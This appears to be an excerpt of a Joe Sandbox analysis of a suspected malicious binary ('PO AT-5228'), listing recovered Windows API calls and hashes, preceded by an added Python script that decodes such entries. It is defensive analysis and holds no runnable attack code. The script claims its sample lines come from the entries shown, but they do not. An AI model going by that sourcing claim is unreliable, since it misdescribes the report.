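The "APIs" lists in these entries are reconstructed from the memory dump, so arguments appear as raw hex, or as "?" where the value could not be recovered. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses entries in exactly the format shown on this page and decodes the constants an analyst would otherwise look up by hand, namely the Winsock version passed to WSAStartup at 00BB8168, the request size, reply-buffer size and millisecond timeout passed to IcmpSendEcho at 00BB8237, the LB_SELECTSTRING message sent at 00B9B98C, the CLSCTX mask passed to CoCreateInstance at 00BBAE61 (and to CoGetInstanceFromFile at 00BBB56D) and the SEM_ flags passed to SetErrorMode at 00BAE396. The sample input is copied from the entries above; the constant tables are the documented Windows SDK values. Because the report's argument positions are heuristic (several SendMessageW lines show 00000111 in the wParam slot), the decoder reads slots positionally and reports "not recovered" rather than guessing.

```python
"""Decode Joe Sandbox "APIs" entries (added example, not report or sample code)."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# One bullet line of an "APIs" list, e.g.
#   • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BB8237
#   • CoInitialize.OLE32 ref: 00BBADF6
#   • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@]+)(?:\.(?P<module>\w+))?"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: Optional[str]
    args: List[str]            # raw tokens: 8-digit hex, "?" or a string literal such as READY
    ref: int                   # call-site address
    subcall: Optional[int]     # set for "Part of subcall function X" lines

def _to_int(tok: str) -> Optional[int]:
    try:
        return int(tok, 16)
    except ValueError:         # "?" (not recovered) or a string argument
        return None

def parse_api_block(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if not m:              # "APIs", "Strings" and other headers
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16),
                             int(m.group("sub"), 16) if m.group("sub") else None))
    return calls

# Windows SDK constants used by the decoders below.
_WINDOW_MESSAGES = {0x0111: "WM_COMMAND", 0x0186: "LB_SETCURSEL", 0x018C: "LB_SELECTSTRING"}
_CLSCTX = [(0x1, "CLSCTX_INPROC_SERVER"), (0x2, "CLSCTX_INPROC_HANDLER"),
           (0x4, "CLSCTX_LOCAL_SERVER"), (0x10, "CLSCTX_REMOTE_SERVER")]
_CLSCTX_NAMES = {0x15: "CLSCTX_SERVER", 0x17: "CLSCTX_ALL"}
_SEM = [(0x1, "SEM_FAILCRITICALERRORS"), (0x2, "SEM_NOGPFAULTERRORBOX"),
        (0x4, "SEM_NOALIGNMENTFAULTEXCEPT"), (0x8000, "SEM_NOOPENFILEERRORBOX")]

def _flags(value: int, table, names=None) -> str:
    """Render a bitmask as OR-ed SDK names, keeping any unknown bits as hex."""
    if names and value in names:
        return names[value]
    known = sum(bit for bit, _ in table)
    parts = [name for bit, name in table if value & bit]
    if value & ~known:
        parts.append(hex(value & ~known))
    return "|".join(parts) or "0"

def _arg(ints: List[Optional[int]], i: int) -> Optional[int]:
    return ints[i] if i < len(ints) else None

def _send_message(ints):
    msg = _arg(ints, 1)        # uMsg is the second parameter
    return ["uMsg not recovered"] if msg is None else [f"uMsg={_WINDOW_MESSAGES.get(msg, hex(msg))}"]

def _icmp_send_echo(ints):     # RequestSize, ReplySize (bytes) and Timeout (ms)
    labels = {3: "RequestSize={}", 6: "ReplySize={}", 7: "Timeout={} ms"}
    return [fmt.format(_arg(ints, i)) for i, fmt in labels.items() if _arg(ints, i) is not None]

def _clsctx(index: int):
    def dec(ints):
        v = _arg(ints, index)
        return [] if v is None else [f"dwClsCtx={_flags(v, _CLSCTX, _CLSCTX_NAMES)}"]
    return dec

def _error_mode(ints):
    v = _arg(ints, 0)
    return [] if v is None else [f"uMode={_flags(v, _SEM)}"]

def _wsa_startup(ints):
    v = _arg(ints, 0)          # MAKEWORD(major, minor): major is the low byte
    return [] if v is None else [f"wVersionRequested=Winsock {v & 0xFF}.{(v >> 8) & 0xFF}"]

_DECODERS: Dict[str, Callable] = {
    "SendMessageW": _send_message, "SendMessageA": _send_message,
    "IcmpSendEcho": _icmp_send_echo,
    "CoCreateInstance": _clsctx(2),        # dwClsContext is the third parameter
    "CoGetInstanceFromFile": _clsctx(3),   # dwClsCtx is the fourth parameter
    "SetErrorMode": _error_mode,
    "WSAStartup": _wsa_startup,
}

def summarize(text: str) -> List[str]:
    """One line per call: address, (via subcall), API.module, decoded arguments."""
    out = []
    for c in parse_api_block(text):
        where = f"{c.ref:08X}" + (f" (via {c.subcall:08X})" if c.subcall is not None else "")
        name = c.api + (f".{c.module}" if c.module else "")
        notes = _DECODERS.get(c.api, lambda _: [])([_to_int(a) for a in c.args])
        out.append(f"{where} {name}" + (": " + ", ".join(notes) if notes else ""))
    return out

# Lines copied from the report entries above (the ICMP function plus a few other call sites).
SAMPLE = """APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00BB8168
• inet_addr.WSOCK32(?,?,?), ref: 00BB81AD
• gethostbyname.WSOCK32(?), ref: 00BB81B9
• IcmpCreateFile.IPHLPAPI ref: 00BB81C7
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BB8237
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00BB82C2
• WSACleanup.WSOCK32 ref: 00BB82C8
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B9B98C
• CoCreateInstance.OLE32(?,00000000,00000017,00BED8FC,?), ref: 00BBAE61
• SetErrorMode.KERNEL32(00000001), ref: 00BAE396
• SetErrorMode.KERNEL32(00000000,READY), ref: 00BAE483
  • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
Strings
"""

if __name__ == "__main__":
    print("\n".join(summarize(SAMPLE)))
```

Running the script prints one line per call; for the ICMP echo at 00BB8237 it reports a 5-byte request, a 41-byte reply buffer (28-byte ICMP_ECHO_REPLY header plus payload and options space) and a 4000 ms timeout. Extend `_DECODERS` with further APIs as needed; every decoder reads only the documented parameter slot, so a shifted argument column shows up as "not recovered" or as an absent note instead of a wrong name.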
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 00B8ACC1
                                                                                          • Part of subcall function 00B87CF4: __mtinitlocknum.LIBCMT ref: 00B87D06
                                                                                          • Part of subcall function 00B87CF4: EnterCriticalSection.KERNEL32(00000000,?,00B87ADD,0000000D), ref: 00B87D1F
                                                                                        • __calloc_crt.LIBCMT ref: 00B8ACD2
                                                                                          • Part of subcall function 00B86986: __calloc_impl.LIBCMT ref: 00B86995
                                                                                          • Part of subcall function 00B86986: Sleep.KERNEL32(00000000,000003BC,00B7F507,?,0000000E), ref: 00B869AC
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00B8ACED
                                                                                        • GetStartupInfoW.KERNEL32(?,00C16E28,00000064,00B85E91,00C16C70,00000014), ref: 00B8AD46
                                                                                        • __calloc_crt.LIBCMT ref: 00B8AD91
                                                                                        • GetFileType.KERNEL32(00000001), ref: 00B8ADD8
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00B8AE11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                        • String ID:
• API String ID: 1426640281-0
• Opcode ID: 947c15b384eeba8abc4d450fd6536dc83262316c9f8a4805585dc8dd86933191
• Instruction ID: 956f39d34b7ac8f77adfd89c0e4bff57325fd2eb41f0c24bfcc48e51158f1796
• Opcode Fuzzy Hash: 947c15b384eeba8abc4d450fd6536dc83262316c9f8a4805585dc8dd86933191
• Instruction Fuzzy Hash: 9481D8719053458FEB24EF68C8806ADBBF0EF05325B2446AED4A6EB3E1D7349843CB55
APIs
• __swprintf.LIBCMT ref: 00BA67FD
• __swprintf.LIBCMT ref: 00BA680A
  • Part of subcall function 00B8172B: __woutput_l.LIBCMT ref: 00B81784
• FindResourceW.KERNEL32(?,?,0000000E), ref: 00BA6834
• LoadResource.KERNEL32(?,00000000), ref: 00BA6840
• LockResource.KERNEL32(00000000), ref: 00BA684D
• FindResourceW.KERNEL32(?,?,00000003), ref: 00BA686D
• LoadResource.KERNEL32(?,00000000), ref: 00BA687F
• SizeofResource.KERNEL32(?,00000000), ref: 00BA688E
• LockResource.KERNEL32(?), ref: 00BA689A
• CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00BA68F9
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
• String ID:
• API String ID: 1433390588-0
• Opcode ID: 618c92c99f399727ed2437007936003796be4eb06f3adf97f85e38cbbd7e4596
• Instruction ID: 750776ce02e07330876014457a6c867c79b566c5a5af92f016449575d88e1da5
• Opcode Fuzzy Hash: 618c92c99f399727ed2437007936003796be4eb06f3adf97f85e38cbbd7e4596
• Instruction Fuzzy Hash: 88318EB190425AABDB109F60DD85ABF7BECEF09340B088466FA12D7150EB78D911DB70
APIs
• GetCurrentThreadId.KERNEL32 ref: 00BA4047
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA405B
• GetWindowThreadProcessId.USER32(00000000), ref: 00BA4062
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA4071
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA4083
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA409C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA40AE
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA40F3
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA4108
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA4113
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 16523ffd120eb2a7f100a08aff9f8323db165b451d33275b71ed5f5d35fc6743
• Instruction ID: 6917f22bd8d7b9cd7fad174aec57463ac933d0768d0380049c0c3797183e36d5
• Opcode Fuzzy Hash: 16523ffd120eb2a7f100a08aff9f8323db165b451d33275b71ed5f5d35fc6743
• Instruction Fuzzy Hash: 0931C171514244AFDB21DF58DC86B6D7BE9FBA2311F10824AF904EB290CBF99D818B60
APIs
• EnumChildWindows.USER32(?,00B9CF50), ref: 00B9CE90
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
• Opcode ID: 508be323b01103b898378b1b6b833151da68f503f893b42ee7e27387d5110587
• Instruction ID: 3cf822f9364c4341a0932c53f3c7a3080c09c74ffaa96265192ee279f7227d57
• Opcode Fuzzy Hash: 508be323b01103b898378b1b6b833151da68f503f893b42ee7e27387d5110587
• Instruction Fuzzy Hash: ED915E74A04506ABCF18DF64C481BEAFFF9FF05300F5085A9E45AA7151DF30A99ADBA0
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B630DC
• CoUninitialize.OLE32(?,00000000), ref: 00B63181
• UnregisterHotKey.USER32(?), ref: 00B632A9
• DestroyWindow.USER32(?), ref: 00BD5079
• FreeLibrary.KERNEL32(?), ref: 00BD50F8
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BD5125
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: ec3016a9436f826c523466731542f7ef618efef9ea3ac8f2286af61b692c2869
• Instruction ID: 428b0bf0a34f06e3462539aadd58456fa6518cee5d0a80cc888a94c9d9e9d8d9
• Opcode Fuzzy Hash: ec3016a9436f826c523466731542f7ef618efef9ea3ac8f2286af61b692c2869
• Instruction Fuzzy Hash: 0F91F6746002468FC715EF24C895A68F3E4FF15704F5482E9E50AAB2A2DF38AE5ACF54
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00B7CC15
  • Part of subcall function 00B7CCCD: GetClientRect.USER32(?,?), ref: 00B7CCF6
  • Part of subcall function 00B7CCCD: GetWindowRect.USER32(?,?), ref: 00B7CD37
  • Part of subcall function 00B7CCCD: ScreenToClient.USER32(?,?), ref: 00B7CD5F
• GetDC.USER32 ref: 00BDD137
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BDD14A
• SelectObject.GDI32(00000000,00000000), ref: 00BDD158
• SelectObject.GDI32(00000000,00000000), ref: 00BDD16D
• ReleaseDC.USER32(?,00000000), ref: 00BDD175
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BDD200
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: b9e6c70c3dfb47a87b753d37ddeb590c5e0bfce72a382f9ea6c377bf42afad56
• Instruction ID: 5e52efd52228f610f747bd1ad5862f1eb983a8446f0e7985ce68117fbd48f74a
• Opcode Fuzzy Hash: b9e6c70c3dfb47a87b753d37ddeb590c5e0bfce72a382f9ea6c377bf42afad56
• Instruction Fuzzy Hash: 9171A130400209DFCF219F64CC81AAABBF5FF59354F1482AEFDA96A2A5E7318841DB50
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BB45FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00BB462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BB466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00BB4682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BB468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00BB46BF
• InternetCloseHandle.WININET(00000000), ref: 00BB4706
  • Part of subcall function 00BB5052: GetLastError.KERNEL32(?,?,00BB43CC,00000000,00000000,00000001), ref: 00BB5067
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
• Opcode ID: 47ce52f9da8e90463d486d3e8492487e5d7875ab07e54a9825b23716f00a6620
• Instruction ID: 96f9dceabd56fb59b191079dae11f666050e684a5607a315e583942d4da97dc6
• Opcode Fuzzy Hash: 47ce52f9da8e90463d486d3e8492487e5d7875ab07e54a9825b23716f00a6620
• Instruction Fuzzy Hash: 1E414BB1501619BFEB129F54CC89FFA77ECFB09354F004196FA069A152DBF09D448BA4
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,00BFDC00), ref: 00BBB715
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00BFDC00), ref: 00BBB749
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BBB8C1
• SysFreeString.OLEAUT32(?), ref: 00BBB8EB
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: a0933e997b50f3294a94f1c7c2569093376dde245ec391049003da10aaa8525e
• Instruction ID: df0e7e441143529af787d00e66dc52526e84daddad735b46c9e2afac1b15f4d7
• Opcode Fuzzy Hash: a0933e997b50f3294a94f1c7c2569093376dde245ec391049003da10aaa8525e
• Instruction Fuzzy Hash: 3EF10775A00209AFCB14DF94C888EFEB7B9FF49315F108499F945AB250DBB1AE45CB90
APIs
• _memset.LIBCMT ref: 00BC24F5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BC2688
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BC26AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BC26EC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BC270E
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BC286F
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00BC28A1
• CloseHandle.KERNEL32(?), ref: 00BC28D0
• CloseHandle.KERNEL32(?), ref: 00BC2947
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
• Opcode ID: 2c1e64939b01d7594a280bd95cba14f7ae0677c565cb62e63a91e79bc72b4bde
• Instruction ID: b9bb50e601734a72a47281c8118ae45c613c333539d84cf9194c45e12121a9f3
• Opcode Fuzzy Hash: 2c1e64939b01d7594a280bd95cba14f7ae0677c565cb62e63a91e79bc72b4bde
• Instruction Fuzzy Hash: 82D18B35604201DFCB14EF24C891F6ABBE5EF85310F1488ADF8999B2A2DB31EC45CB52
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BCB3F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: 2f430ce8e8b86e1f90c1e7ca80aef2598389c5d7328fb307e0ebfb72a8e10aa6
• Instruction ID: d74418dad0edfdb77848066ef1cbdb60bdf87dd8619288439b98d3750b6e473b
• Opcode Fuzzy Hash: 2f430ce8e8b86e1f90c1e7ca80aef2598389c5d7328fb307e0ebfb72a8e10aa6
• Instruction Fuzzy Hash: DC519E30600254BFEF249F28CCD6FAD3BE4EB45314F24419AFA25E62E2DB71E9448B55
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00BDDB1B
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BDDB3C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BDDB51
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00BDDB6E
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BDDB95
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,00B7A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00BDDBA0
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BDDBBD
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,00B7A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00BDDBC8
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
• Opcode ID: 778fb9cb24e7b9ed05f7194b695239988c1cc3462412654409114b7389d984cb
• Instruction ID: 9c7c14d8381435d000bbde879c476354dffe71c28493020ea243f0a1ccf8b5fc
• Opcode Fuzzy Hash: 778fb9cb24e7b9ed05f7194b695239988c1cc3462412654409114b7389d984cb
• Instruction Fuzzy Hash: 6B515A70600209EFDB24DF64CC81FAE77F4EB58754F104559F95A9B690EBB0AD80DB50
APIs
  • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BA5FA6,?), ref: 00BA6ED8
  • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BA5FA6,?), ref: 00BA6EF1
  • Part of subcall function 00BA72CB: GetFileAttributesW.KERNEL32(?,00BA6019), ref: 00BA72CC
• lstrcmpiW.KERNEL32(?,?), ref: 00BA75CA
• _wcscmp.LIBCMT ref: 00BA75E2
• MoveFileW.KERNEL32(?,?), ref: 00BA75FB
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
• Opcode ID: eedbd0f3e0cab0039825629e65aa4b64232b7d4c3ed850f3e0c859fc5831a509
• Instruction ID: c382c91ef2c88e6df8ea8aa7ad1795dde7b57253a329b4a264168bcd101e43c5
• Opcode Fuzzy Hash: eedbd0f3e0cab0039825629e65aa4b64232b7d4c3ed850f3e0c859fc5831a509
• Instruction Fuzzy Hash: 14511CB2A4D2199ADF50EB94DC819DE73FCEF09310B1044EAFA05A3151EA7496C9CF60
APIs
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00BDDAD1,00000004,00000000,00000000), ref: 00B7EAEB
• ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00BDDAD1,00000004,00000000,00000000), ref: 00B7EB32
• ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00BDDAD1,00000004,00000000,00000000), ref: 00BDDC86
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00BDDAD1,00000004,00000000,00000000), ref: 00BDDCF2
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 255577b93d0a2b533e9f8735114af0681846b8e19cd98fd2d3c24a4dfb2f1e34
• Instruction ID: 8e686c18366bb7480da78cefc2552b2358c29b5f16daa7e97c6b134c4fb3a0b4
• Opcode Fuzzy Hash: 255577b93d0a2b533e9f8735114af0681846b8e19cd98fd2d3c24a4dfb2f1e34
• Instruction Fuzzy Hash: F741E7702146809AD73547288DCDB2ABED5EF59304F1D88CEF0BF86B61D6B1F880C611
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B26C
• HeapAlloc.KERNEL32(00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B273
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B9AEF1,00000B00,?,?), ref: 00B9B288
• GetCurrentProcess.KERNEL32(?,00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B290
• DuplicateHandle.KERNEL32(00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B293
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00B9AEF1,00000B00,?,?), ref: 00B9B2A3
